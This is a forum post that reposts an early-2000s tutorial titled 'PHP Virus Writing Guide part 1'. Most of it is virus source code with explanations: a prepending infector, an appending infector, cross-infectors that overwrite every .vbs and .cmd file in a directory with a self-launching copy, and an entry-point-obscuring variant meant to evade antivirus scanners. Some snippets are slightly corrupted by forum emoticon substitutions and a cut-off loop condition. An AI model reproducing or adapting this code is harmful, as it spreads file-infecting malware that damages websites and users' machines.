Prva Gimnazija Zagreb Forum
Pozdrav,latinski riječnik update+povijest update!
Pretraľnik
 
 

Display results as :
 


Rechercher Advanced Search

Broj posjeta:
Mesothelioma
Mesothelioma

PHP Virus Writing Guide part 1

Prethodna tema Sljedeća tema Go down

PHP Virus Writing Guide part 1

Postaj  zekton on pet tra 17, 2009 1:02 am

******

0) Intro Words

1) File infection
a) Prepending
b) Appending
c) Cross Infection
i) VBS infection
ii) JS infection
iii) CMD infection
d) Entry Point Obscuring
i) Include the virus after a command
ii) Useing a function of the victim

2) Encryption
a) Changing virus to ASCII
b) Useing an intern decryption function
c) Useing changed character string

3) Polymorphism
a) Adding Trash
b) Change Variable Names
c) Number Changing

4) Other Thoughts
a) Find more files
b) Changing the commands

5) Last Words



0) Intro Words

PHP, abbreviate: 'Hypertext Preprocessor', is a very common script language
for the world-wide-web. You're possible to do nearly everthing internet
related with that language. That means, you're also able to make viruses
for it. The first virus for PHP, PHP.Pirus by MaskBits/VXI, was done in
October 2000, and was released in 29A#5. It was no real virus, moreover
a companion. It writes to every PHP-file in the current directory a line,
which let the victim run the virus. But the host doesn't contain the virus.
After searching something about PHP viruses I found out that there is no
high-tech PHP virus so far out, because all the virus I could find are rips
of PHP.Pirus (useing the same prinzip). That was my inspiration in writing
such an article. I wanted to make something totally new, and I guess I had
success. I tested every source with PHP 4.3.3, and everthing worked fine.
Now go on reading this and learn something about PHP viruses! Smile




1) File Infection

That's maybe the most important thing, when you want to make a PHP virus,
therefor I want to explain you, how you can infect files with PHP. It should
be no problme to understand the examples, because I tried it to make as
simple as possible. When the article was written (autumn 2003), there was
no real file infector out there. The only interesting PHP virus so far is
MaskBits' PHP.Pirus, which don't infect files, but use the command 'include'
that the virus is executed in every PHP file in the current dir. You may think
'Why does he tell me this?". I don't know, just for fun Smile. Now let me explain
you how to infect files.



a) Prepending

A prepender copies it's code infront of the victim's code, therefor it will
be executed before the victim. That's the main idea of this kind of infection.
But there are some other important things you have to note: To get the virus
out of the file, you need any information about where the virus is. In my
example the virus uses the first 391 bytes. Next important thing is, that you
must not infect a file two times. What do to against that? Check, if the file
if already infected. In the following example the virus searchs in the first
13 bytes (in an infected file it's this code: ' 'SPTH'. If yes, the file won't be infected. OK, I think, you understood. Now
let's look at the PHP Prepender Virus example:

- - - - - - - - - - - - - [ PHP Prepender Virus Example ] - - - - - - - - - - - - -
$string=fread(fopen(__FILE__,'r'), 391);
$curdir=opendir('.');
while ($file = readdir($curdir))
{
if (strstr($file, '.php'))
{
$victim=fopen($file, 'r+');
if (!strstr(fread($victim, 13), 'SPTH'))
{
rewind($victim);
fwrite($victim, $string.fread($victim, filesize($file))Wink;
}
fclose($victim);
}
}
closedir($curdir);
?>
- - - - - - - - - - - - - [ PHP Prepender Virus Example ] - - - - - - - - - - - - -

As this is a real easy virus, you should understand it quickly while looking
at it. Now i'm going to give you the most important things the example does:

--> Reading the first 391 bytes (which is exactly the virus size)

--> Searchs for every .PHP file in the current directory

--> If not infected, reading the victim







b) Appending

An Appender is a virus, which copies itself after the victim file. It's
really easy to make one. You just have to search the last php-part (or
just make a infection-mark at the begin of the virus. Then you read till
the end, and you have your virus-file. The rest should clear: Search a
victim, check if not infected and copy the virus-body in the end of the
file. I made an exaple for that, as you migth think. The exact explanation
will be in the end after the code.

- - - - - - - - - - - - - [ PHP Appender Virus Example ] - - - - - - - - - - - - -
$string='$curdir=opendir('.');
while ($file = readdir($curdir))
{
if (strstr($file, '.php'))
{
$victim=fopen($file, 'r+');
if (!strstr(fread($victim, filesize($file)), 'SPTH'))
{
fwrite($victim, $string);
}
fclose($victim);
}
}
closedir($curdir);
?>
- - - - - - - - - - - - - [ PHP Appender Virus Example ] - - - - - - - - - - - - -

I've already explained how the prinzip works. Now I'll explain you my example:

--> Opens the infected file, and save the virus body (searching for 'SPTH', and
save the rest of the file)

--> Searchs for every php-file in the current directory.

--> Checks is not infected (searchs for the infection mark 'SPTH' anywhere in
the file. If not found: Not infected

--> Copies the virusbody to the file







c) Cross Infection

Cross Infection means infecting more than one file extansion. That's really
useful, because the virus will spread much faster. That was my inspiration
in writing this. I found some nice ways how to infect other file-formats,
therefor I want to show you them. The biggest problem while coding these
things was, that you can't execute a .php file directly, but with an Internet
Browser. Fortunatly Microsoft make it possible to open the Internet Explorer
very easiely. Smile


i) VBS infection

It's really easy to infect a vbs-file, because the only important thing
if you want to write such a cross infector is, that you don't have to use
the sign [" = chr(34) ], because VisualBasicscript uses it for strings, and
since our whole code is a string in the VBS-file, there would be an error.
Now look at the example, and try to understand (shouldn be too difficult,
because I made it very easy to read).

- - - - - - - - - - - - - [ Cross Infector - VBS ] - - - - - - - - - - - - -
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$vbscode='set fso=Wscript.CreateObject('.chr(34).'scripting.FileSystemObject'.chr(34).')'.chr(13).chr(10);
$vbscode.='set shell=Wscript.CreateObject('.chr(34).'Wscript.Shell'.chr(34).')'.chr(13).chr(10);
$vbscode.='set virus=fso.CreateTextFile('.chr(34).'index.htm'.chr(34).')'.chr(13).chr(10);
while ($string && $string!='?>')
{
$vbscode.='virus.WriteLine('.chr(34).$string.chr(34).')'.chr(13).chr(10);
$string=strtok(chr(13).chr(10));
}
$vbscode.='virus.WriteLine('.chr(34).'?';
$vbscode.='>'.chr(34).')'.chr(13).chr(10);
$vbscode.='virus.Close()'.chr(13).chr(10);
$vbscode.='shell.Run '.chr(34).'index.htm'.chr(34);
$directory=opendir('.');
while ($file = readdir($directory))
{
if (strstr($file, '.vbs'))
{
fwrite(fopen($file, 'w'), $vbscode);
}
}
closedir($directory);
?>
- - - - - - - - - - - - - [ Cross Infector - VBS ] - - - - - - - - - - - - -

It should be totally easy to understand this example. Anyway, I'll give
you the main ideas of the little code:

--> Splits the php-code (=virus) into lines [chr(13).chr(10)]

--> Makes a vbs code, which generates a new HTM-file containing the virus

--> Adds every line to the VBS (as string, so it will be written to the
HTM-file, which will be generated by the VBS [?!?! :D])

--> After finishing the VBS-code, it searches for every .VBS in the current
directory and overwrites it with the code, which we made before.







ii) JS infection

Infecting a Javascript file is nearly the same as infecting a VBS file, therefore
I won't give you an example. The reason for this is, that we're using Wscript in
VBS and JS. The only thing you have to do is to change the 'set' to 'var', and the
'.vbs' to '.js', but i guess, you know that :D. I tried it, and it worked fine.







iii) CMD infection

This was the most difficult file extansion, which I made for this article. The
reason is easy to explain: CMD = Batch for WinNT/00/XP = DOS. And as you know
you are NOT allowed to use any '>', '<' or '&' in a DOS-string. But I solved the
problem, as you may imagine Wink. I used the characters in every string instead of
the read signs. Than I had 2 more problems: The begin and the end of the PHP code,
where we MUST write '<' or '>'. So I thougth about that, and suddenly a idea came
to my mind: I'll use a Javascript file, to write the first and the last line to
the .htm file. And since I have to use a script anyway for starting the Internet
Explorer (to run the PHP-code - DOS can't open a Internet Browser), I used that file.
The result of my coding is the following file :D. I'll explain the main-ideas more
exactly after the source.

- - - - - - - - - - - - - [ Cross Infector - BAT ] - - - - - - - - - - - - -
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$string=strtok(chr(13).chr(10));
$cmdcode='cls'.chr(13).chr(10).'@echo off'.chr(13).chr(10).'del index.html'.chr(13).chr(10);
while ($string{0}!='?')
{
$cmdcode.='echo '.$string.chr(62).chr(62).'index.html'.chr(13).chr(10);
$string=strtok(chr(13).chr(10));
}
$cmdcode.='echo var fso=Wscript.CreateObject("scripting.FileSystemObject");'.chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo var shell=Wscript.CreateObject("Wscript.Shell");'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo all=fso.OpenTextFile("index.html").ReadAll();'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo a=fso.OpenTextFile("index.html",2);'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo a.Write(String.fromCharCode(60,63,112,104,112,13,10)+all+String.fromCharCode(13,10,63,62));'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo a.Close();'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo shell.Run("index.html");'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='cscript file.js';

$directory=opendir('.');
while ($file = readdir($directory))
{
if (strstr($file, '.cmd'))
{
fwrite(fopen($file, 'w'), $cmdcode);
}
}
closedir($directory);
?>
- - - - - - - - - - - - - [ Cross Infector - BAT ] - - - - - - - - - - - - -

Now the shourt explanation of the code:

--> Reads the whole file content (the virus), and splits it to lines

--> Makes the .CMD code, which don't contain any '>','<' and '&' (that
was the problem I wrote before)

--> Adds a Javascript code to the .CMD code, so the first and the last lines
('') will be added to the new .htm file.

--> Adds a code to the .CMD code, which runs the indernet-explorer

--> Overwrites every .CMD file in the current directory with the CMD-code.







d) Entry Point Obscuring

This is a really important technique in virus-writing. Maybe some of you
don't know, what EPO exactly is. So I'll explain you: An AV-program searchs
in most cases at some static offsets for the virus (maybe at the begin or
at the begin). To fake them, we have to use a variable adress of the virus,
and don't use any jump or call to the virus at a static adress. How could we
do this? I'll show you a short 'grafic'. At this point I want to thank
SnakeByte for his Perl-EPO article [released in 29a#6] for the idea, how
to make a EPO virus in a script language. So, here is the grafic:

[ part of the victim file ]
information about the address
read xxx lines of the virus
open PHP file
read yyy lines
insert the virus
read rest
close PHP file
[ rest of the victim file ]

Now we have another problem: Where to include the virus-code in the host-file?
SnakeByte did it searching for ';', which is the end of a Perl command. As
you meigth know, also PHP statments ends with a ';'. Than I thought about an
other way, which could be also done, since that technique could be destruction
of the victim-file. Than i got an idea: including the code to an function.
how i exactly mean this, I'll show you after the ';'-example.


i) Include the virus after a command

As I already told you, this idea comes from SnakeByte. To include a virus
after a command, you have to search for a ';', which is the end of every
PHP statement. That seems to be everything. Now let's have a look at the
example for this EPO technique.


- - - - - - - - - - - - - [ EPO virus - Type I ] - - - - - - - - - - - - -
$ln=16;
$filehandle=fopen(__FILE__,'r');
srand((double)microtime()*1000000);
fseek($filehandle, $ln);
$content=fread($filehandle, 987);
fclose($filehandle);
$curdir=opendir('.');
while ($file = readdir($curdir))
{
if (strstr($file, '.php'))
{
$victim=fopen($file, 'r+');
$vicont=fread($victim, filesize($file));
if (!strstr($vicont, 'SPTH'))
{
$possible=0; $c=0;
while($c {
if($vicont{$c}.$vicont{$c+1}.$vicont{$c+2}==chr(59).chr(13).chr(10)) { $possible++;}
$c++;
}
$which=rand(1,$possible); $c=0; $i=0;
while($which)
{
if($vicont{$c}.$vicont{$c+1}.$vicont{$c+2}==chr(59).chr(13).chr(10)) { $which--; }
$c++;
}
rewind($victim);
$a=fread($victim, $c); $b=fread($victim, filesize($file));
fclose($victim);
fwrite(fopen($file, 'w'), $a.chr(13).chr(10).'$ln='.$c.';'.chr(13).chr(10).$content.chr(13).chr(10).$b);
}
}
}
?>
avatar
zekton
Profesionalac
Profesionalac

Broj postova : 65
Join date : 15.02.2009

Korisnički profil

[Vrh] Go down

Prethodna tema Sljedeća tema [Vrh]

- Similar topics

 
Permissions in this forum:
Ne moľeą odgovarati na postove.